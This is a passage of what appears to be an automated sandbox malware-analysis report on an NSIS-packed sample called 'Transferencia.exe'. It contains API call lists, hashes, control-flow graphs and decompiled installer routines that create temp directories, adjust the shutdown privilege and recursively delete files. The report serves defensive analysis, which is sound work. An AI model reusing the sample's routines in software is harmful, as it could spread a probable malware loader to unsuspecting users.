                                                  • Part of subcall function 00405AC8: CreateDirectoryW.KERNELBASE(?,00000000,004034FD,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037ED), ref: 00405ACE
                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp), ref: 0040394D
                                                • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,007B4800,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Transferencia.exe" ,00000000,?), ref: 00403959
                                                • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403979
                                                • DeleteFileW.KERNEL32(0079F708,0079F708,?,007A9000,?), ref: 004039D8
                                                • CopyFileW.KERNEL32(C:\Users\user\Desktop\Transferencia.exe,0079F708,00000001), ref: 004039EB
                                                • CloseHandle.KERNEL32(00000000,0079F708,0079F708,?,0079F708,00000000), ref: 00403A18
                                                • OleUninitialize.OLE32(?), ref: 00403A3B
                                                • ExitProcess.KERNEL32 ref: 00403A55
                                                • GetCurrentProcess.KERNEL32(00000028,?), ref: 00403A69
                                                • OpenProcessToken.ADVAPI32(00000000), ref: 00403A70
                                                • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403A84
                                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403AA3
                                                • ExitWindowsEx.USER32 ref: 00403AC8
                                                • ExitProcess.KERNEL32 ref: 00403AE9
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.755415149.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.755408358.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755428109.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755438602.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755693232.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755731847.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755772036.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755817113.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755939181.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755971847.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.756009900.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.756022297.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.756029667.00000000007DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Transferencia.jbxd
                                                Similarity
                                                • API ID: lstrcat$FileProcess$DirectoryExit$CurrentDeleteEnvironmentPathTempTokenVariableVersionWindows$AdjustCharCloseCommandCopyCreateErrorHandleInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesUninitializeValuelstrcmpilstrlen
                                                • String ID: "C:\Users\user\Desktop\Transferencia.exe" $.tmp$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop\Transferencia.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                • API String ID: 3859024572-377582768
                                                • Opcode ID: 4f4eec0de79c21e215e23cc6c73292148191a8a8d39fbf5898b354216cb2abd3
                                                • Instruction ID: 53a60b58fdbd25313d51bce5ca3a2b86b24fade18f433b590921527e5da6acff
                                                • Opcode Fuzzy Hash: 4f4eec0de79c21e215e23cc6c73292148191a8a8d39fbf5898b354216cb2abd3
                                                • Instruction Fuzzy Hash: B2E1F8B0A00214ABD720AFB59D45ABF3AB8EB45705F10807EF581B62D1DB7C8B41CB6D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 143 4056bb-4056d6 144 405865-40586c 143->144 145 4056dc-4057a3 GetDlgItem * 3 call 4044ab call 404e04 GetClientRect GetSystemMetrics SendMessageW * 2 143->145 147 405896-4058a3 144->147 148 40586e-405890 GetDlgItem CreateThread FindCloseChangeNotification 144->148 167 4057c1-4057c4 145->167 168 4057a5-4057bf SendMessageW * 2 145->168 150 4058c1-4058cb 147->150 151 4058a5-4058ab 147->151 148->147 155 405921-405925 150->155 156 4058cd-4058d3 150->156 153 4058e6-4058ef call 4044dd 151->153 154 4058ad-4058bc ShowWindow * 2 call 4044ab 151->154 164 4058f4-4058f8 153->164 154->150 155->153 159 405927-40592d 155->159 161 4058d5-4058e1 call 40444f 156->161 162 4058fb-40590b ShowWindow 156->162 159->153 169 40592f-405942 SendMessageW 159->169 161->153 165 40591b-40591c call 40444f 162->165 166 40590d-405916 call 40557c 162->166 165->155 166->165 172 4057d4-4057eb call 404476 167->172 173 4057c6-4057d2 SendMessageW 167->173 168->167 174 405a44-405a46 169->174 175 405948-405973 CreatePopupMenu call 406557 AppendMenuW 169->175 180 405821-405842 GetDlgItem SendMessageW 172->180 181 4057ed-405801 ShowWindow 172->181 173->172 174->164 182 405975-405985 GetWindowRect 175->182 183 405988-40599d TrackPopupMenu 175->183 180->174 187 405848-405860 SendMessageW * 2 180->187 184 405810 181->184 185 405803-40580e ShowWindow 181->185 182->183 183->174 186 4059a3-4059ba 183->186 188 405816-40581c call 4044ab 184->188 185->188 189 4059bf-4059da SendMessageW 186->189 187->174 188->180 189->189 190 4059dc-4059ff OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 189->190 192 405a01-405a28 SendMessageW 190->192 192->192 193 405a2a-405a3e GlobalUnlock SetClipboardData CloseClipboard 192->193 193->174
                                                C-Code - Quality: 95%
                                                			E004056BB(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
                                                				struct HWND__* _v8;
                                                				long _v12;
                                                				struct tagRECT _v28;
                                                				void* _v36;
                                                				signed int _v40;
                                                				int _v44;
                                                				int _v48;
                                                				signed int _v52;
                                                				int _v56;
                                                				void* _v60;
                                                				void* _v68;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				struct HWND__* _t94;
                                                				long _t95;
                                                				int _t100;
                                                				void* _t108;
                                                				intOrPtr _t119;
                                                				void* _t127;
                                                				intOrPtr _t130;
                                                				struct HWND__* _t134;
                                                				int _t156;
                                                				int _t159;
                                                				struct HMENU__* _t164;
                                                				struct HWND__* _t168;
                                                				struct HWND__* _t169;
                                                				int _t171;
                                                				void* _t172;
                                                				short* _t173;
                                                				short* _t175;
                                                				int _t177;
                                                
                                                				_t169 =  *0x7a7a44;
                                                				_t156 = 0;
                                                				_v8 = _t169;
                                                				if(_a8 != 0x110) {
                                                					if(_a8 == 0x405) {
                                                						_t127 = CreateThread(0, 0, E0040564F, GetDlgItem(_a4, 0x3ec), 0,  &_v12); // executed
                                                						FindCloseChangeNotification(_t127); // executed
                                                					}
                                                					if(_a8 != 0x111) {
                                                						L17:
                                                						_t171 = 1;
                                                						if(_a8 != 0x404) {
                                                							L25:
                                                							if(_a8 != 0x7b) {
                                                								goto L20;
                                                							}
                                                							_t94 = _v8;
                                                							if(_a12 != _t94) {
                                                								goto L20;
                                                							}
                                                							_t95 = SendMessageW(_t94, 0x1004, _t156, _t156);
                                                							_a8 = _t95;
                                                							if(_t95 <= _t156) {
                                                								L36:
                                                								return 0;
                                                							}
                                                							_t164 = CreatePopupMenu();
                                                							AppendMenuW(_t164, _t156, _t171, E00406557(_t156, _t164, _t171, _t156, 0xffffffe1));
                                                							_t100 = _a16;
                                                							_t159 = _a16 >> 0x10;
                                                							if(_a16 == 0xffffffff) {
                                                								GetWindowRect(_v8,  &_v28);
                                                								_t100 = _v28.left;
                                                								_t159 = _v28.top;
                                                							}
                                                							if(TrackPopupMenu(_t164, 0x180, _t100, _t159, _t156, _a4, _t156) == _t171) {
                                                								_v60 = _t156;
                                                								_v48 = 0x7a1f48;
                                                								_v44 = 0x1000;
                                                								_a4 = _a8;
                                                								do {
                                                									_a4 = _a4 - 1;
                                                									_t171 = _t171 + SendMessageW(_v8, 0x1073, _a4,  &_v68) + 2;
                                                								} while (_a4 != _t156);
                                                								OpenClipboard(_t156);
                                                								EmptyClipboard();
                                                								_t108 = GlobalAlloc(0x42, _t171 + _t171);
                                                								_a4 = _t108;
                                                								_t172 = GlobalLock(_t108);
                                                								do {
                                                									_v48 = _t172;
                                                									_t173 = _t172 + SendMessageW(_v8, 0x1073, _t156,  &_v68) * 2;
                                                									 *_t173 = 0xd;
                                                									_t175 = _t173 + 2;
                                                									 *_t175 = 0xa;
                                                									_t172 = _t175 + 2;
                                                									_t156 = _t156 + 1;
                                                								} while (_t156 < _a8);
                                                								GlobalUnlock(_a4);
                                                								SetClipboardData(0xd, _a4);
                                                								CloseClipboard();
                                                							}
                                                							goto L36;
                                                						}
                                                						if( *0x7a7a2c == _t156) {
                                                							ShowWindow( *0x7a8a68, 8);
                                                							if( *0x7a8aec == _t156) {
                                                								_t119 =  *0x7a0f20; // 0x9a9554
                                                								E0040557C( *((intOrPtr*)(_t119 + 0x34)), _t156);
                                                							}
                                                							E0040444F(_t171);
                                                							goto L25;
                                                						}
                                                						 *0x7a0718 = 2;
                                                						E0040444F(0x78);
                                                						goto L20;
                                                					} else {
                                                						if(_a12 != 0x403) {
                                                							L20:
                                                							return E004044DD(_a8, _a12, _a16);
                                                						}
                                                						ShowWindow( *0x7a7a30, _t156);
                                                						ShowWindow(_t169, 8);
                                                						E004044AB(_t169);
                                                						goto L17;
                                                					}
                                                				}
                                                				_v52 = _v52 | 0xffffffff;
                                                				_v40 = _v40 | 0xffffffff;
                                                				_t177 = 2;
                                                				_v60 = _t177;
                                                				_v56 = 0;
                                                				_v48 = 0;
                                                				_v44 = 0;
                                                				asm("stosd");
                                                				asm("stosd");
                                                				_t130 =  *0x7a8a70;
                                                				_a8 =  *((intOrPtr*)(_t130 + 0x5c));
                                                				_a12 =  *((intOrPtr*)(_t130 + 0x60));
                                                				 *0x7a7a30 = GetDlgItem(_a4, 0x403);
                                                				 *0x7a7a28 = GetDlgItem(_a4, 0x3ee);
                                                				_t134 = GetDlgItem(_a4, 0x3f8);
                                                				 *0x7a7a44 = _t134;
                                                				_v8 = _t134;
                                                				E004044AB( *0x7a7a30);
                                                				 *0x7a7a34 = E00404E04(4);
                                                				 *0x7a7a4c = 0;
                                                				GetClientRect(_v8,  &_v28);
                                                				_v52 = _v28.right - GetSystemMetrics(_t177);
                                                				SendMessageW(_v8, 0x1061, 0,  &_v60); // executed
                                                				SendMessageW(_v8, 0x1036, 0x4000, 0x4000); // executed
                                                				if(_a8 >= 0) {
                                                					SendMessageW(_v8, 0x1001, 0, _a8);
                                                					SendMessageW(_v8, 0x1026, 0, _a8);
                                                				}
                                                				if(_a12 >= _t156) {
                                                					SendMessageW(_v8, 0x1024, _t156, _a12);
                                                				}
                                                				_push( *((intOrPtr*)(_a16 + 0x30)));
                                                				_push(0x1b);
                                                				E00404476(_a4);
                                                				if(( *0x7a8a78 & 0x00000003) != 0) {
                                                					ShowWindow( *0x7a7a30, _t156);
                                                					if(( *0x7a8a78 & 0x00000002) != 0) {
                                                						 *0x7a7a30 = _t156;
                                                					} else {
                                                						ShowWindow(_v8, 8);
                                                					}
                                                					E004044AB( *0x7a7a28);
                                                				}
                                                				_t168 = GetDlgItem(_a4, 0x3ec);
                                                				SendMessageW(_t168, 0x401, _t156, 0x75300000);
                                                				if(( *0x7a8a78 & 0x00000004) != 0) {
                                                					SendMessageW(_t168, 0x409, _t156, _a12);
                                                					SendMessageW(_t168, 0x2001, _t156, _a8);
                                                				}
                                                				goto L36;
                                                			}



































                                                0x004056c3
                                                0x004056c9
                                                0x004056d3
                                                0x004056d6
                                                0x0040586c
                                                0x00405889
                                                0x00405890
                                                0x00405890
                                                0x004058a3
                                                0x004058c1
                                                0x004058c3
                                                0x004058cb
                                                0x00405921
                                                0x00405925
                                                0x00000000
                                                0x00000000
                                                0x00405927
                                                0x0040592d
                                                0x00000000
                                                0x00000000
                                                0x00405937
                                                0x0040593f
                                                0x00405942
                                                0x00405a44
                                                0x00000000
                                                0x00405a44
                                                0x00405951
                                                0x0040595c
                                                0x00405965
                                                0x00405970
                                                0x00405973
                                                0x0040597c
                                                0x00405982
                                                0x00405985
                                                0x00405985
                                                0x0040599d
                                                0x004059a6
                                                0x004059a9
                                                0x004059b0
                                                0x004059b7
                                                0x004059bf
                                                0x004059bf
                                                0x004059d6
                                                0x004059d6
                                                0x004059dd
                                                0x004059e3
                                                0x004059ef
                                                0x004059f6
                                                0x004059ff
                                                0x00405a01
                                                0x00405a04
                                                0x00405a13
                                                0x00405a16
                                                0x00405a1c
                                                0x00405a1d
                                                0x00405a23
                                                0x00405a24
                                                0x00405a25
                                                0x00405a2d
                                                0x00405a38
                                                0x00405a3e
                                                0x00405a3e
                                                0x00000000
                                                0x0040599d
                                                0x004058d3
                                                0x00405903
                                                0x0040590b
                                                0x0040590d
                                                0x00405916
                                                0x00405916
                                                0x0040591c
                                                0x00000000
                                                0x0040591c
                                                0x004058d7
                                                0x004058e1
                                                0x00000000
                                                0x004058a5
                                                0x004058ab
                                                0x004058e6
                                                0x00000000
                                                0x004058ef
                                                0x004058b4
                                                0x004058b9
                                                0x004058bc
                                                0x00000000
                                                0x004058bc
                                                0x004058a3
                                                0x004056dc
                                                0x004056e0
                                                0x004056e8
                                                0x004056ec
                                                0x004056ef
                                                0x004056f2
                                                0x004056f5
                                                0x004056f8
                                                0x004056f9
                                                0x004056fa
                                                0x00405713
                                                0x00405716
                                                0x00405720
                                                0x0040572f
                                                0x00405737
                                                0x0040573f
                                                0x00405744
                                                0x00405747
                                                0x00405753
                                                0x0040575c
                                                0x00405765
                                                0x00405787
                                                0x0040578d
                                                0x0040579e
                                                0x004057a3
                                                0x004057b1
                                                0x004057bf
                                                0x004057bf
                                                0x004057c4
                                                0x004057d2
                                                0x004057d2
                                                0x004057d7
                                                0x004057da
                                                0x004057df
                                                0x004057eb
                                                0x004057f4
                                                0x00405801
                                                0x00405810
                                                0x00405803
                                                0x00405808
                                                0x00405808
                                                0x0040581c
                                                0x0040581c
                                                0x00405830
                                                0x00405839
                                                0x00405842
                                                0x00405852
                                                0x0040585e
                                                0x0040585e
                                                0x00000000

                                                APIs
                                                • GetDlgItem.USER32 ref: 00405719
                                                • GetDlgItem.USER32 ref: 00405728
                                                • GetClientRect.USER32 ref: 00405765
                                                • GetSystemMetrics.USER32 ref: 0040576C
                                                • SendMessageW.USER32(?,00001061,00000000,?), ref: 0040578D
                                                • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 0040579E
                                                • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004057B1
                                                • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004057BF
                                                • SendMessageW.USER32(?,00001024,00000000,?), ref: 004057D2
                                                • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 004057F4
                                                • ShowWindow.USER32(?,00000008), ref: 00405808
                                                • GetDlgItem.USER32 ref: 00405829
                                                • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405839
                                                • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405852
                                                • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 0040585E
                                                • GetDlgItem.USER32 ref: 00405737
                                                  • Part of subcall function 004044AB: SendMessageW.USER32(00000028,?,00000001,004042D6), ref: 004044B9
                                                • GetDlgItem.USER32 ref: 0040587B
                                                • CreateThread.KERNELBASE ref: 00405889
                                                • FindCloseChangeNotification.KERNELBASE(00000000), ref: 00405890
                                                • ShowWindow.USER32(00000000), ref: 004058B4
                                                • ShowWindow.USER32(?,00000008), ref: 004058B9
                                                • ShowWindow.USER32(00000008), ref: 00405903
                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405937
                                                • CreatePopupMenu.USER32 ref: 00405948
                                                • AppendMenuW.USER32 ref: 0040595C
                                                • GetWindowRect.USER32 ref: 0040597C
                                                • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405995
                                                • SendMessageW.USER32(?,00001073,00000000,?), ref: 004059CD
                                                • OpenClipboard.USER32(00000000), ref: 004059DD
                                                • EmptyClipboard.USER32 ref: 004059E3
                                                • GlobalAlloc.KERNEL32(00000042,00000000), ref: 004059EF
                                                • GlobalLock.KERNEL32 ref: 004059F9
                                                • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A0D
                                                • GlobalUnlock.KERNEL32(00000000), ref: 00405A2D
                                                • SetClipboardData.USER32 ref: 00405A38
                                                • CloseClipboard.USER32 ref: 00405A3E
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.755415149.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.755408358.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755428109.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755438602.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755693232.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755731847.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755772036.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755817113.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755939181.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755971847.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.756009900.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.756022297.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.756029667.00000000007DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Transferencia.jbxd
                                                Similarity
                                                • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendChangeClientDataEmptyFindLockMetricsNotificationOpenSystemThreadTrackUnlock
                                                • String ID: {
                                                • API String ID: 4154960007-366298937
                                                • Opcode ID: 6f9b910c36771dad060a0dd0b7d94d2eb85d45aef733cfe21307c5b05fb3eeaa
                                                • Instruction ID: d7cac64708ae36737aaf404740c8a4e4a0ccfdbfd79e04772bb75515dd65aeb5
                                                • Opcode Fuzzy Hash: 6f9b910c36771dad060a0dd0b7d94d2eb85d45aef733cfe21307c5b05fb3eeaa
                                                • Instruction Fuzzy Hash: BFB14BB1900608FFDF11AF64DD89AAE7B79FB48354F00802AFA41B61A0CB795A51DF58
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 442 405c26-405c4c call 405ef1 445 405c65-405c6c 442->445 446 405c4e-405c60 DeleteFileW 442->446 448 405c6e-405c70 445->448 449 405c7f-405c8f call 40651a 445->449 447 405de2-405de6 446->447 450 405d90-405d95 448->450 451 405c76-405c79 448->451 455 405c91-405c9c lstrcatW 449->455 456 405c9e-405c9f call 405e35 449->456 450->447 453 405d97-405d9a 450->453 451->449 451->450 457 405da4-405dac call 406850 453->457 458 405d9c-405da2 453->458 459 405ca4-405ca8 455->459 456->459 457->447 466 405dae-405dc2 call 405de9 call 405bde 457->466 458->447 462 405cb4-405cba lstrcatW 459->462 463 405caa-405cb2 459->463 465 405cbf-405cdb lstrlenW FindFirstFileW 462->465 463->462 463->465 467 405ce1-405ce9 465->467 468 405d85-405d89 465->468 482 405dc4-405dc7 466->482 483 405dda-405ddd call 40557c 466->483 471 405d09-405d1d call 40651a 467->471 472 405ceb-405cf3 467->472 468->450 470 405d8b 468->470 470->450 484 405d34-405d3f call 405bde 471->484 485 405d1f-405d27 471->485 474 405cf5-405cfd 472->474 475 405d68-405d78 FindNextFileW 472->475 474->471 478 405cff-405d07 474->478 475->467 481 405d7e-405d7f FindClose 475->481 478->471 478->475 481->468 482->458 488 405dc9-405dd8 call 40557c call 4062da 482->488 483->447 495 405d60-405d63 call 40557c 484->495 496 405d41-405d44 484->496 485->475 489 405d29-405d32 call 405c26 485->489 488->447 489->475 495->475 498 405d46-405d56 call 40557c call 4062da 496->498 499 405d58-405d5e 496->499 498->475 499->475
                                                C-Code - Quality: 98%
                                                			E00405C26(void* __eflags, signed int _a4, signed int _a8) {
                                                				signed int _v8;
                                                				signed int _v12;
                                                				short _v556;
                                                				short _v558;
                                                				struct _WIN32_FIND_DATAW _v604;
                                                				signed int _t38;
                                                				signed int _t52;
                                                				signed int _t55;
                                                				signed int _t62;
                                                				void* _t64;
                                                				signed char _t65;
                                                				WCHAR* _t66;
                                                				void* _t67;
                                                				WCHAR* _t68;
                                                				void* _t70;
                                                
                                                				_t65 = _a8;
                                                				_t68 = _a4;
                                                				_v8 = _t65 & 0x00000004;
                                                				_t38 = E00405EF1(__eflags, _t68);
                                                				_v12 = _t38;
                                                				if((_t65 & 0x00000008) != 0) {
                                                					_t62 = DeleteFileW(_t68); // executed
                                                					asm("sbb eax, eax");
                                                					_t64 =  ~_t62 + 1;
                                                					 *0x7a8ae8 =  *0x7a8ae8 + _t64;
                                                					return _t64;
                                                				}
                                                				_a4 = _t65;
                                                				_t8 =  &_a4;
                                                				 *_t8 = _a4 & 0x00000001;
                                                				__eflags =  *_t8;
                                                				if( *_t8 == 0) {
                                                					L5:
                                                					E0040651A(0x7a3f50, _t68);
                                                					__eflags = _a4;
                                                					if(_a4 == 0) {
                                                						E00405E35(_t68);
                                                					} else {
                                                						lstrcatW(0x7a3f50, L"\\*.*");
                                                					}
                                                					__eflags =  *_t68;
                                                					if( *_t68 != 0) {
                                                						L10:
                                                						lstrcatW(_t68, 0x40a014);
                                                						L11:
                                                						_t66 =  &(_t68[lstrlenW(_t68)]);
                                                						_t38 = FindFirstFileW(0x7a3f50,  &_v604);
                                                						_t70 = _t38;
                                                						__eflags = _t70 - 0xffffffff;
                                                						if(_t70 == 0xffffffff) {
                                                							L26:
                                                							__eflags = _a4;
                                                							if(_a4 != 0) {
                                                								_t30 = _t66 - 2;
                                                								 *_t30 =  *(_t66 - 2) & 0x00000000;
                                                								__eflags =  *_t30;
                                                							}
                                                							goto L28;
                                                						} else {
                                                							goto L12;
                                                						}
                                                						do {
                                                							L12:
                                                							__eflags = _v604.cFileName - 0x2e;
                                                							if(_v604.cFileName != 0x2e) {
                                                								L16:
                                                								E0040651A(_t66,  &(_v604.cFileName));
                                                								__eflags = _v604.dwFileAttributes & 0x00000010;
                                                								if(__eflags == 0) {
                                                									_t52 = E00405BDE(__eflags, _t68, _v8);
                                                									__eflags = _t52;
                                                									if(_t52 != 0) {
                                                										E0040557C(0xfffffff2, _t68);
                                                									} else {
                                                										__eflags = _v8 - _t52;
                                                										if(_v8 == _t52) {
                                                											 *0x7a8ae8 =  *0x7a8ae8 + 1;
                                                										} else {
                                                											E0040557C(0xfffffff1, _t68);
                                                											E004062DA(_t67, _t68, 0);
                                                										}
                                                									}
                                                								} else {
                                                									__eflags = (_a8 & 0x00000003) - 3;
                                                									if(__eflags == 0) {
                                                										E00405C26(__eflags, _t68, _a8);
                                                									}
                                                								}
                                                								goto L24;
                                                							}
                                                							__eflags = _v558;
                                                							if(_v558 == 0) {
                                                								goto L24;
                                                							}
                                                							__eflags = _v558 - 0x2e;
                                                							if(_v558 != 0x2e) {
                                                								goto L16;
                                                							}
                                                							__eflags = _v556;
                                                							if(_v556 == 0) {
                                                								goto L24;
                                                							}
                                                							goto L16;
                                                							L24:
                                                							_t55 = FindNextFileW(_t70,  &_v604);
                                                							__eflags = _t55;
                                                						} while (_t55 != 0);
                                                						_t38 = FindClose(_t70);
                                                						goto L26;
                                                					}
                                                					__eflags =  *0x7a3f50 - 0x5c;
                                                					if( *0x7a3f50 != 0x5c) {
                                                						goto L11;
                                                					}
                                                					goto L10;
                                                				} else {
                                                					__eflags = _t38;
                                                					if(_t38 == 0) {
                                                						L28:
                                                						__eflags = _a4;
                                                						if(_a4 == 0) {
                                                							L36:
                                                							return _t38;
                                                						}
                                                						__eflags = _v12;
                                                						if(_v12 != 0) {
                                                							_t38 = E00406850(_t68);
                                                							__eflags = _t38;
                                                							if(_t38 == 0) {
                                                								goto L36;
                                                							}
                                                							E00405DE9(_t68);
                                                							_t38 = E00405BDE(__eflags, _t68, _v8 | 0x00000001);
                                                							__eflags = _t38;
                                                							if(_t38 != 0) {
                                                								return E0040557C(0xffffffe5, _t68);
                                                							}
                                                							__eflags = _v8;
                                                							if(_v8 == 0) {
                                                								goto L30;
                                                							}
                                                							E0040557C(0xfffffff1, _t68);
                                                							return E004062DA(_t67, _t68, 0);
                                                						}
                                                						L30:
                                                						 *0x7a8ae8 =  *0x7a8ae8 + 1;
                                                						return _t38;
                                                					}
                                                					__eflags = _t65 & 0x00000002;
                                                					if((_t65 & 0x00000002) == 0) {
                                                						goto L28;
                                                					}
                                                					goto L5;
                                                				}
                                                			}


















                                                0x00405c30
                                                0x00405c35
                                                0x00405c3e
                                                0x00405c41
                                                0x00405c49
                                                0x00405c4c
                                                0x00405c4f
                                                0x00405c57
                                                0x00405c59
                                                0x00405c5a
                                                0x00000000
                                                0x00405c5a
                                                0x00405c65
                                                0x00405c68
                                                0x00405c68
                                                0x00405c68
                                                0x00405c6c
                                                0x00405c7f
                                                0x00405c86
                                                0x00405c8b
                                                0x00405c8f
                                                0x00405c9f
                                                0x00405c91
                                                0x00405c97
                                                0x00405c97
                                                0x00405ca4
                                                0x00405ca8
                                                0x00405cb4
                                                0x00405cba
                                                0x00405cbf
                                                0x00405cc5
                                                0x00405cd0
                                                0x00405cd6
                                                0x00405cd8
                                                0x00405cdb
                                                0x00405d85
                                                0x00405d85
                                                0x00405d89
                                                0x00405d8b
                                                0x00405d8b
                                                0x00405d8b
                                                0x00405d8b
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00405ce1
                                                0x00405ce1
                                                0x00405ce1
                                                0x00405ce9
                                                0x00405d09
                                                0x00405d11
                                                0x00405d16
                                                0x00405d1d
                                                0x00405d38
                                                0x00405d3d
                                                0x00405d3f
                                                0x00405d63
                                                0x00405d41
                                                0x00405d41
                                                0x00405d44
                                                0x00405d58
                                                0x00405d46
                                                0x00405d49
                                                0x00405d51
                                                0x00405d51
                                                0x00405d44
                                                0x00405d1f
                                                0x00405d25
                                                0x00405d27
                                                0x00405d2d
                                                0x00405d2d
                                                0x00405d27
                                                0x00000000
                                                0x00405d1d
                                                0x00405ceb
                                                0x00405cf3
                                                0x00000000
                                                0x00000000
                                                0x00405cf5
                                                0x00405cfd
                                                0x00000000
                                                0x00000000
                                                0x00405cff
                                                0x00405d07
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00405d68
                                                0x00405d70
                                                0x00405d76
                                                0x00405d76
                                                0x00405d7f
                                                0x00000000
                                                0x00405d7f
                                                0x00405caa
                                                0x00405cb2
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00405c6e
                                                0x00405c6e
                                                0x00405c70
                                                0x00405d90
                                                0x00405d92
                                                0x00405d95
                                                0x00405de6
                                                0x00405de6
                                                0x00405de6
                                                0x00405d97
                                                0x00405d9a
                                                0x00405da5
                                                0x00405daa
                                                0x00405dac
                                                0x00000000
                                                0x00000000
                                                0x00405daf
                                                0x00405dbb
                                                0x00405dc0
                                                0x00405dc2
                                                0x00000000
                                                0x00405ddd
                                                0x00405dc4
                                                0x00405dc7
                                                0x00000000
                                                0x00000000
                                                0x00405dcc
                                                0x00000000
                                                0x00405dd3
                                                0x00405d9c
                                                0x00405d9c
                                                0x00000000
                                                0x00405d9c
                                                0x00405c76
                                                0x00405c79
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00405c79

                                                APIs
                                                • DeleteFileW.KERNELBASE(?,?,76CDFAA0,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405C4F
                                                • lstrcatW.KERNEL32(007A3F50,\*.*), ref: 00405C97
                                                • lstrcatW.KERNEL32(?,0040A014), ref: 00405CBA
                                                • lstrlenW.KERNEL32(?,?,0040A014,?,007A3F50,?,?,76CDFAA0,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405CC0
                                                • FindFirstFileW.KERNEL32(007A3F50,?,?,?,0040A014,?,007A3F50,?,?,76CDFAA0,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405CD0
                                                • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405D70
                                                • FindClose.KERNEL32(00000000), ref: 00405D7F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.755415149.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
